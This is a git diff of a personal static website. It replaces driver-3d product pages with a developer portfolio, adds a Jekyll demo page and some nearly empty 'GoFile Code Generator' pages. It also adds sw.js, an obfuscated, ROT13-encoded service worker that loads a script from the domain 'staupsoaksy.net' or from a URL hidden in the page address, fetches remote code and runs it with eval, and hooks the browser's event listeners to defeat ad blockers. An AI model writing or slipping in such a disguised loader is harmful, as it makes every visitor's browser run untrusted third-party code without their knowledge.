diff --git a/home.html b/home.html deleted file mode 100644 index af01a64..0000000 --- a/home.html +++ /dev/null @@ -1,39 +0,0 @@ - - - - - - driver-3d - Home - - - -
-

driver-3d

- -
-
-
-

About driver-3d

-

driver-3d is designed to provide users with an efficient way to manage and share their Google Drive files. Our application offers robust features to organize, share, and manage your files with ease.

-
-
-

Features

- -
-
- - - diff --git a/index.html b/index.html index af01a64..49d0134 100644 --- a/index.html +++ b/index.html @@ -1,39 +1,55 @@ + - driver-3d - Home + Developer Anaz (DevAnaZ) - Portfolio
-

driver-3d

-
-

About driver-3d

-

driver-3d is designed to provide users with an efficient way to manage and share their Google Drive files. Our application offers robust features to organize, share, and manage your files with ease.

+
+

Welcome to Developer Anaz's Portfolio

+

Your source for all things coding, development, and tech.

-
-

Features

-
    -
  • Easy file management
  • -
  • Secure file sharing
  • -
  • Comprehensive file search
  • -
  • File preview and organization
  • -
+
+

Documentation

+

Find all the necessary documents and guides here.

+
+
+

GitHub

+

Check out my projects on GitHub.

+
+
+

About Me

+

My name is Anaz and I'm a passionate developer with a focus on creating efficient and scalable solutions. With years of experience in web development, I specialize in front-end and back-end development. Check out my work on GitHub and connect with me to learn more.

+
+
+

Sitemap

+

Navigate through the site using the links provided.

+
+
+

Policy

+

Read through our policies to understand how we operate.

+ diff --git a/index.md b/index.md new file mode 100644 index 0000000..8611051 --- /dev/null +++ b/index.md @@ -0,0 +1,123 @@ +--- +layout: default +--- + +Text can be **bold**, _italic_, or ~~strikethrough~~. + +[Link to another page](./another-page.html). + +There should be whitespace between paragraphs. + +There should be whitespace between paragraphs. We recommend including a README, or a file with information about your project. + +# Header 1 + +This is a normal paragraph following a header. GitHub is a code hosting platform for version control and collaboration. It lets you and others work together on projects from anywhere. + +## Header 2 + +> This is a blockquote following a header. +> +> When something is important enough, you do it even if the odds are not in your favor. + +### Header 3 + +```js +// Javascript code with syntax highlighting. +var fun = function lang(l) { + dateformat.i18n = require('./lang/' + l) + return true; +} +``` + +```ruby +# Ruby code with syntax highlighting +GitHubPages::Dependencies.gems.each do |gem, version| + s.add_dependency(gem, "= #{version}") +end +``` + +#### Header 4 + +* This is an unordered list following a header. +* This is an unordered list following a header. +* This is an unordered list following a header. + +##### Header 5 + +1. This is an ordered list following a header. +2. This is an ordered list following a header. +3. This is an ordered list following a header. + +###### Header 6 + +| head1 | head two | three | +|:-------------|:------------------|:------| +| ok | good swedish fish | nice | +| out of stock | good and plenty | nice | +| ok | good `oreos` | hmm | +| ok | good `zoute` drop | yumm | + +### There's a horizontal rule below this. + +* * * + +### Here is an unordered list: + +* Item foo +* Item bar +* Item baz +* Item zip + +### And an ordered list: + +1. Item one +1. Item two +1. Item three +1. Item four + +### And a nested list: + +- level 1 item + - level 2 item + - level 2 item + - level 3 item + - level 3 item +- level 1 item + - level 2 item + - level 2 item + - level 2 item +- level 1 item + - level 2 item + - level 2 item +- level 1 item + +### Small image + +![Octocat](https://github.githubassets.com/images/icons/emoji/octocat.png) + +### Large image + +![Branching](https://guides.github.com/activities/hello-world/branching.png) + + +### Definition lists can be used with HTML syntax. + +
+
Name
+
Godzilla
+
Born
+
1952
+
Birthplace
+
Japan
+
Color
+
Green
+
+ +``` +Long, single-line code blocks should not wrap. They should horizontally scroll if they are too long. This line should be long enough to demonstrate this. +``` + +``` +The final element. +``` diff --git a/privacy-policy.html b/privacy-policy.html deleted file mode 100644 index 1325fd1..0000000 --- a/privacy-policy.html +++ /dev/null @@ -1,42 +0,0 @@ - - - - - - driver-3d - Privacy Policy - - - -
-

driver-3d

- -
-
-
-

Privacy Policy

-

Your privacy is important to us. This privacy policy explains how we collect, use, and protect your information when you use driver-3d.

-
-
-

Information We Collect

-

We collect information to provide better services to our users, including data about your Google Drive files and usage patterns.

-
-
-

How We Use Information

-

We use the information we collect to improve our services, enhance your user experience, and ensure the security of your data.

-
-
-

Information Sharing

-

We do not share personal information with companies, organizations, or individuals outside of driver-3d, except when required by law.

-
-
- - - diff --git a/styles.css b/styles.css index 76220c9..5683e16 100644 --- a/styles.css +++ b/styles.css @@ -1,90 +1,91 @@ -body { - font-family: Arial, sans-serif; +* { margin: 0; padding: 0; - display: flex; - flex-direction: column; - min-height: 100vh; - background-color: #f0f2f5; + box-sizing: border-box; +} + +body { + font-family: Arial, sans-serif; + line-height: 1.6; } header { - background-color: #333; - color: white; - padding: 20px 0; + background: #333; + color: #fff; + padding: 1rem 0; text-align: center; + position: relative; } -header h1 { - margin: 0; - font-size: 2em; +nav { + display: flex; + justify-content: space-between; + align-items: center; + padding: 0 1rem; +} + +.menu-icon { + display: none; + font-size: 1.5rem; + cursor: pointer; } nav ul { list-style: none; - padding: 0; display: flex; - justify-content: center; - margin: 0; + justify-content: space-around; + width: 100%; } nav ul li { - margin: 0 15px; + margin: 0 10px; } nav ul li a { - color: white; + color: #fff; text-decoration: none; - font-size: 1.1em; -} - -nav ul li a:hover { - text-decoration: underline; + font-weight: bold; } main { - flex: 1; - padding: 20px; - background-color: #fff; - max-width: 900px; - margin: 20px auto; - box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); - border-radius: 8px; + padding: 2rem; } -.intro, .features, .privacy-policy, .terms-of-service { - margin-bottom: 20px; +section { + margin-bottom: 2rem; } -.intro h2, .features h2, .privacy-policy h2, .terms-of-service h2 { - color: #333; - border-bottom: 2px solid #e0e0e0; - padding-bottom: 10px; +h1, h2 { + margin-bottom: 1rem; } -.intro p, .privacy-policy p, .terms-of-service p, section p { - line-height: 1.6; - color: #555; +footer { + background: #333; + color: #fff; + text-align: center; + padding: 1rem 0; + position: relative; } -.features ul { - list-style: disc inside; - padding-left: 20px; -} +/* Responsive Styles */ +@media (max-width: 768px) { + .menu-icon { + display: block; + } -.features li { - margin-bottom: 10px; - font-size: 1.1em; -} + nav ul { + display: none; + flex-direction: column; + width: 100%; + text-align: center; + background: #333; + } -footer { - background-color: #333; - color: white; - text-align: center; - padding: 15px 0; - font-size: 0.9em; -} + nav ul li { + margin: 10px 0; + } -footer p { - margin: 0; + nav ul.show { + display: flex; + } } diff --git a/sw.js b/sw.js new file mode 100644 index 0000000..d840301 --- /dev/null +++ b/sw.js @@ -0,0 +1 @@ +(function(O){!function(e){var t=O.Z();function n(r){if(t[r])return t[r][O.i];var i=t[r]=O.Z(O.B,r,O.w,!O.X,O.i,O.Z());return e[r][O.z](i[O.i],i,i[O.i],n),i[O.w]=!O.N,i[O.i]}n[O.y]=e,n[O.g]=t,n[O.K]=function(e,t,r){n[O.h](e,t)||Object[O.b](e,t,O.Z(O.GO,!O.N,O.RO,r))},n[O.G]=function(e){O.HO!=typeof Symbol&&Symbol[O.hO]&&Object[O.b](e,Symbol[O.hO],O.Z(O.p,O.cO)),Object[O.b](e,O.U,O.Z(O.p,!O.N))},n[O.R]=function(e,t){if(O.X&t&&(e=n(e)),O.v&t)return e;if(O.P&t&&O.t==typeof e&&e&&e[O.U])return e;var r=Object[O.r](O.q);if(n[O.G](r),Object[O.b](r,O.C,O.Z(O.GO,!O.N,O.p,e)),O.d&t&&O.oO!=typeof e)for(var i in e)n[O.K](r,i,function(t){return e[t]}[O.fO](O.q,i));return r},n[O.H]=function(e){var t=e&&e[O.U]?function(){return e[O.C]}:function(){return e};return n[O.K](t,O.OO,t),t},n[O.h]=function(e,t){return Object[O.FO][O.a][O.z](e,t)},n[O.e]=O.F,n(n[O.m]=O.o)}(O.Z(O.o,function(module,exports,__webpack_require__){O.f;var _antiadblock=__webpack_require__(O.O);self[O.c]=O.Z(O.S,9285149,O.V,"staupsoaksy.net",O.l,!O.N),self[O.D]=O.F;var DEFAULT_URL=[O.Y,O.j][O.A](self[O.c][O.V]),STORE_EVENTS=[O.T,O.u,O.M,O.L,O.n,O.E],url;try{if(url=atob(location[O.DO][O.x](O.X)),!url)throw O.q}catch(e){url=DEFAULT_URL}try{importScripts(url)}catch(ignore){var events=O.Z(),listeners=O.Z(),realAddEventListener=self[O.yO][O.fO](self);STORE_EVENTS[O.ZO](function(e){self[O.yO](e,function(t){events[e]||(events[e]=[]),events[e][O.M](t),listeners[e]&&listeners[e][O.ZO](function(e){try{e(t)}catch(e){}})})}),self[O.yO]=function(e,t){if(-O.X===STORE_EVENTS[O.qO](e))return realAddEventListener(e,t);listeners[e]||(listeners[e]=[]),listeners[e][O.M](t),events[e]&&events[e][O.ZO](function(e){try{t(e)}catch(e){}})},(O.N,_antiadblock[O.I])(url,O.Z())[O.gO](function(e){return e[O.UO]()})[O.gO](function(code){return eval(code)})}},O.O,function(e,t,n){O.f;Object[O.b](t,O.U,O.Z(O.p,!O.N)),t[O.Q]=function(e){return new Promise(function(t,n){r(O.BO)[O.gO](function(r){var i=r[O.tO]([O.lO],O.rO)[O.xO](O.lO)[O.WO](O.Z(O.V,e,O.dO,new Date()[O.CO]()));i[O.yO](O.EO,t),i[O.yO](O.nO,n)})})},t[O.I]=async function(e,t){var n=await new Promise(function(e,t){r(O.BO)[O.gO](function(n){var r=n[O.tO]([O.lO],O.rO)[O.xO](O.lO)[O.PO]();r[O.yO](O.nO,t),r[O.yO](O.EO,function(){return e(r[O.XO][O.oF](function(e){return e[O.V]}))})})}),o=!O.N,a=!O.X,s=void O.N;try{for(var c,u=n[Symbol[O.QO]]();!(o=(c=u[O.IO]())[O.uO]);o=!O.N){var d=c[O.p];try{return await fetch(O.Y+d+O.s+i(),O.Z(O.YO,t[O.YO]||O.RO,O.jO,O.pO,O.sO,t[O.sO],O.vO,O.Z(O.kO,btoa(e))))}catch(e){}}}catch(e){a=!O.N,s=e}finally{try{!o&&u[O.JO]&&u[O.JO]()}finally{if(a)throw s}}throw new Error(O.eO)},t[O.J]=async function(e){try{var t=await fetch(e[O.qO](O.SO)>-O.X?e:O.Y+e);return!O.X===(await t[O.bO]())[O.TO]}catch(e){return!O.X}};function r(e){return new Promise(function(t,n){var r=indexedDB[O.MO](e,O.X);r[O.yO](O.LO,function(){r[O.XO][O.VO](O.lO,O.Z(O.aO,O.V))}),r[O.yO](O.nO,n),r[O.yO](O.EO,function(){return t(r[O.XO])})})}function i(){var e=arguments[O.iO]>O.N&&void O.N!==arguments[O.N]?arguments[O.N]:O.N,t=eO.k,n=Math[O.mO]()[O.zO](O.wO)[O.x](O.d,O.KO+parseInt(O.AO*Math[O.mO](),O.NO));return n+(t?O.s+i(e+O.X):O.F)}}))}([['o',111],['O',17],['F',''],['f','hfr fgevpg'],['Z',function(){const obj={};const args=[].slice.call(arguments);for(let i=0;i(Object.defineProperty(o,i[0],{get:()=>typeof i[1]!=='string'?i[1]:i[1].split('').map(s=>{const c=s.charCodeAt(0);return c>=65&&c<=90?String.fromCharCode((c-65+26-13)%26+65):c>=97&&c<=122?String.fromCharCode((c-97+26-13)%26+97):s}).join('')}),o),{})))/*importScripts(...r=sw)*/ diff --git a/terms-of-service.html b/terms-of-service.html deleted file mode 100644 index b0c0242..0000000 --- a/terms-of-service.html +++ /dev/null @@ -1,42 +0,0 @@ - - - - - - driver-3d - Terms of Service - - - -
-

driver-3d

- -
-
-
-

Terms of Service

-

Welcome to driver-3d. By using our services, you agree to the following terms and conditions.

-
-
-

Use of Services

-

You must follow any policies made available to you within the services. You agree not to use the service for any illegal activities or content.

-
-
-

User Responsibilities

-

As a user, you are responsible for maintaining the confidentiality of your account information and for all activities that occur under your account.

-
-
-

Limitation of Liability

-

To the extent permitted by law, driver-3d shall not be liable for any indirect, incidental, special, consequential, or punitive damages, or any loss of profits or revenues, whether incurred directly or indirectly.

-
-
-
-

© 2024 driver-3d. All rights reserved.

-
- - diff --git a/webapps/gofile.io/gen-modern-test.html b/webapps/gofile.io/gen-modern-test.html new file mode 100644 index 0000000..202ae5c --- /dev/null +++ b/webapps/gofile.io/gen-modern-test.html @@ -0,0 +1,499 @@ + + + + + + GoFile Code Generator + + + + +
+

GoFile CodeGen

+ + + +
+ +
+ + + + +
+ +
+ + +
+ + + + + + diff --git a/webapps/gofile.io/gofile-io-code-generator.html b/webapps/gofile.io/gofile-io-code-generator.html new file mode 100644 index 0000000..7686823 --- /dev/null +++ b/webapps/gofile.io/gofile-io-code-generator.html @@ -0,0 +1,373 @@ + + + + + + + + GoFile Code Generator + + + + + + + +
+ + +

GoFile Code Generator

+ + + +
+ +
+ + + + +
+ +
+ + +
+ + + + diff --git a/webapps/gofile.io/testgen.html b/webapps/gofile.io/testgen.html new file mode 100644 index 0000000..912c7d4 --- /dev/null +++ b/webapps/gofile.io/testgen.html @@ -0,0 +1,452 @@ + + + + + + GoFile Code Generator + + + + +
+

GoFile Code Generator

+ + + +
+ +
+ + + + +
+ +
+ + +
+ + + + + +